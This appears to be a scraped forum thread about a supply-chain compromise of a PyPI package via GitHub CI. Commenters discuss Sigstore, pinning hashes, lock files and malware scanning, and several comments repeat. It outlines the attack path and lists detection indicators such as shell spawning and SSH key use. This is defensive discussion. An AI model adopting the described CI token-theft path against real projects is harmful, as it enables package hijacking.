Really cool to see all the hard work on Trusted Publishing and Sigstore pay off here. As a reminder, these tools were never meant to prevent attacks like this, only to make them easier to detect, harder to hide, and easier to recover from.
Just getting around to looking at this. There is a certificate in sigstore for the 8.3.41 that claims the package is a build of cb260c243ffa3e0cc84820095cd88be2f5db86ca -- https://search.sigstore.dev/?logIndex=153415340. But it isn't. The package content differ from the content of that commit. This doesn't seem like something that's working that well.
As a user of PyPI, what’s a best practice to protect against compromised libraries?
I fear that freezing the version number is inadequate because attackers (who don’t forget, control the dependency) could change the git tag and redeploy a commonly used version with different code.
Is it really viable to use hashes to lock the requirements.txt?
Release files on PyPI are immutable: an attacker can’t overwrite a pre-existing file for a version. So if you pin to an exact version, you are (in principle) protected from downloading a new malicious one.
The main caveat to the above is that files are immutable on PyPI, but releases are not. So an attacker can’t overwrite an existing file (or delete and replace one), but they can always add a more specific distribution to a release if one doesn’t already exist. In practice, this means that a release that doesn’t have an arm64 wheel (for example) could have one uploaded to it.
TL;DR: pinning to a version is suitable for most settings; pinning to the exact set of hashes for that version’s file will prevent new files from being added to that version without you knowing.
Download the libraries' real source repos, apply static analysis tools, audit the source code manually, then build wheels from source instead of using prebuilt stuff from PyPI. Repeat for every update of every library. Publish your audits using crev, so others can benefit from them. Push the Python community to think about Reproducible Builds and Bootstrappable Builds.
This is where tools like poetry, uv with lock files shine. The lock files contains all transient dependencies (like pip freeze) but they do it automatically.
Personally I'd move as much logic out of the YAML as possible into either pure shell scripts or scripts in other languages. Then use shellcheck other appropriate linters for those scripts.
Maybe one day someone will write a proper linter for the shell-wrapped-in-yaml insanity that are these CI systems, but it seems unlikely.
Attacker sent a PR to the ultralytics repository that triggered Github CI. This results in
1) attacker trigger new version publication on the CI itself
2) attacker was able to obtain secrets token for publish to PyPi
Sadly, popular open source projects are vulnerable to this vector. A popular package that is adopted by a large vendor (Redhat/Microsoft) may see a PR from months or a year ago materialize in their product update pipeline. That is too easy to weaponize so that it doesn't manifest until needed or in a different environment.
We scan PyPI packages regularly for malware to provide a private registry of vetted packages.
The tech is open-sourced: Packj [1]. It uses static+dynamic code/behavioral analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect impersonating packages (typo squatting).
If the tech is open-sourced, then an attacker can keep trying in private until they find an exploit, and then use it.
Also, you only know if your security measures work if you test them. I'd feel much safer if there was regular pen-testing by security researchers. We're talking about potential threats from nation state actors here.
I fear that freezing the version number is inadequate because attackers (who don’t forget, control the dependency) could change the git tag and redeploy a commonly used version with different code.
Is it really viable to use hashes to lock the requirements.txt?
The main caveat to the above is that files are immutable on PyPI, but releases are not. So an attacker can’t overwrite an existing file (or delete and replace one), but they can always add a more specific distribution to a release if one doesn’t already exist. In practice, this means that a release that doesn’t have an arm64 wheel (for example) could have one uploaded to it.
TL;DR: pinning to a version is suitable for most settings; pinning to the exact set of hashes for that version’s file will prevent new files from being added to that version without you knowing.
Trim your requirements.txt
https://github.com/crev-dev/https://reproducible-builds.org/https://bootstrappable.org/
Lock files may contain hashes.
Honestly safety in CI/CD seems near impossible anyways.
https://docs.gitlab.com/ee/ci/yaml/lint.html
Personally I'd move as much logic out of the YAML as possible into either pure shell scripts or scripts in other languages. Then use shellcheck other appropriate linters for those scripts.
Maybe one day someone will write a proper linter for the shell-wrapped-in-yaml insanity that are these CI systems, but it seems unlikely.
The tech is open-sourced: Packj [1]. It uses static+dynamic code/behavioral analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect impersonating packages (typo squatting).
1. https://github.com/ossillate-inc/packj
Also, you only know if your security measures work if you test them. I'd feel much safer if there was regular pen-testing by security researchers. We're talking about potential threats from nation state actors here.
https://github.com/pypi-data
Dead Comment
Deleted Comment